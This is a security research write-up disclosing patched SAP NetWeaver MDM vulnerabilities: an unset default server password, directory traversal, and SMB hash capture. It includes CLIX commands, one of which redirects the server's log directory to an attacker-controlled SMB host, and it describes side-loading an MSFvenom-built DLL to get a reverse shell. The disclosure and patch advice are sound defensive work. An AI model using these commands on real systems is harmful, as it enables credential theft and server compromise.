An overlooked SAP solution that needs more SAP security attention
In this post, we will look at several SAP security vulnerabilities in SAP Master Data Management (MDM) discovered from a research by the Protect4S team. All vulnerabilities are patched earlier this year, taking into account the grace period of 3 months.
The vulnerabilities discussed in this article are:
|2021-21472||2998173||6,3||Server password not set during installation of SAP NetWeaver Master Data|
|2021-21475||3000897||4||Directory Traversal vulnerability in SAP NetWeaver Master Data Management 7.1|
|2021-21469||2993032||5,3||Information Disclosure in SAP NetWeaver Master Data Management|
The above findings (by itself or combined) might lead to a full compromise of your SAP MDM systems and its data.
About SAP MDM
SAP Netweaver Master Data Management (MDM) is a solution acquired by SAP many years ago and is used to consolidate and cleanse master data in large SAP landscapes, where there is a need for “a single version of the truth” when it comes to master data. It is unlike the other Netweaver solutions, not running on an ABAP or JAVA stack, but has its architecture. It can be used in many synchronization scenarios with SAP PI/PO for example, or with SAP ECC. To manage the solution, you can use a management plugin on the SAP Java stack, an ABAP based management tool, change configuration files on the Operating system of the MDM server or make use of the CLIX client tool that we will cover in this write-up.
Our research on SAP systems in the past has been focused on a lot of the traditional SAP ABAP based systems. Therefore, we want to extend our research into some new fields. Because SAP MDM was used by some customers and has a completely different setup, we decided to have a look into SAP MDM.
One of the first things we did (apart from setting up a fully patched MDM Server 7.1) was going through the documentation, and like for other SAP products, there was a lot. A first find was done already at a quick moment as one of the SAP guides for MDM stated:
Now that sounds interesting. Customers themselves should set a password but it is not set by default. This probably means that many customers will not do that because who reads a guide anyway, and from an admin perspective, it is easier not to set it. We double-checked with some customers and indeed, no password. This means that with the CLIX client, you can execute several commands to retrieve information on the MDM server or even change its configuration.
This CLIX client is not an easy thing to work through with. It has to be on the same version as the server otherwise it refuses to connect to the MDM server and the calls you can make are not always in a user-friendly format. There are several groups of commands. For example, to control the MDM server, to look at the Database part of the installation and to control the repository for MDM. The command #CLIX -h gives you an overview:
For example, to see if the MDM repository is available, you can execute:
#clix.exe repIsAvailable 192.168.2.222 “SRM_MDM_Catalog;SAPMDM;S;”
As you might notice, no credentials are needed to be passed to the MDM server by default. You just need to know some information, like the name of the repository.
The absence of authentication by default is providing you with many options to further explore the SAP MDM server. The SAP Security response team acknowledged this and for new installation, it now forces users to set a password for the server immediately from the installation wizard. See SAP Security note 2998173 – [CVE-2021-21472] Server password not set during installation of SAP NetWeaver Master Data for more information.
A second vulnerability was found when we started further exploring to see what we could do with the CLIX client and which commands were there. As it turns out, there are commands to get information but also commands that can write information and configuration to the central mds.ini file that is used for the configuration of many parameters. The latter was fixed by SAP by implementing stronger authentication, so we started looking for other options. One interesting command was the mdsgetreportfile command that retrieves reports from the SAP MDM Server stored in the \usr\sap\MDM\MDS00\mdm\reports directory and that contains all kind of log files on operations performed on the MDM Server. But access is not limited to this directory solely as you can simply escape the directory with a typical directory traversal as shown below:
Making it possible to retrieve any file from the server. For customers that have not installed a recently fixed SAP MDM Server where they are forced to set a password, this is still all possible without any form of authentication.
The Directory traversal vulnerability is fixed by SAP Security note 3000897 – [CVE-2021-21475] Directory Traversal vulnerability in SAP NetWeaver Master Data Management 7.1. What was interesting is that by the above vulnerability, you can also download the SAP MDM configuration file mds.ini that contains the hashed password for the Database:
The third finding was done by altering the parameters in the mds.ini file by the command #clix mdssetparameter. This is only possible if no MDM server password is set and by doing so, you can, for example, change the log directory to a SMB share on windows servers leading to a typical SMB Relay attack. This can be done via the command:
# clix mdssetparameter <MDM host or IP> “log dir=\\<your own controlled host or IP>\XXX”.
After a restart of the MDM server, you will be able to capture the SMB hashes and brute force these offline leading to the used OS user’s password. This is fixed in a separate SAP Security note: 2993032 – [CVE-2021-21469] Information Disclosure in SAP NetWeaver Master Data Management.
Some other findings reported to the SAP Security team were discarded as most of them are fixed by setting a MDM Server password. However, many customers might still not have done this as they installed SAP MDM years ago via an installer where they were not forced to set a password. One particular example we want to mention and demonstrate below is the side-loading of malicious DLLs or libraries.
By crafting a malicious DLL via MSFvenom on Kali Linux and referring to that DLL over the network, you can force the SAP MDM server to load this malicious DLL on startup and send a shell to a machine under your control. See a demonstration in this video:
The above example is again to stress that setting the server password is important in preventing exploitation of your SAP MDM Server.
Risk / Exploitation
SAP MDM is not as widespread as the typical SAP ABAP and JAVA-based solutions. Still, we encounter it regularly from customers. We do not see SAP MDM involved in internet-facing scenarios, so that might lower the risk somewhat. Yet, SAP MDM servers are always connected to the rest of the SAP landscape and one compromised SAP MDM box might provide a way into the rest of your business-critical SAP landscape. Making sure it gets and stays secure is recommended.
To get and stay secure, include SAP MDM into a Vulnerability Management process like you should do for all other SAP components too. Make sure to patch this component when SAP Security notes are released for it and set a MDM server password via the MDM console:
More SAP MDM vulnerabilities have been discovered by this research and are reported to the SAP Security response team but are still under embargo. Make sure to review the SAP Security notes monthly if you use this component in your landscape.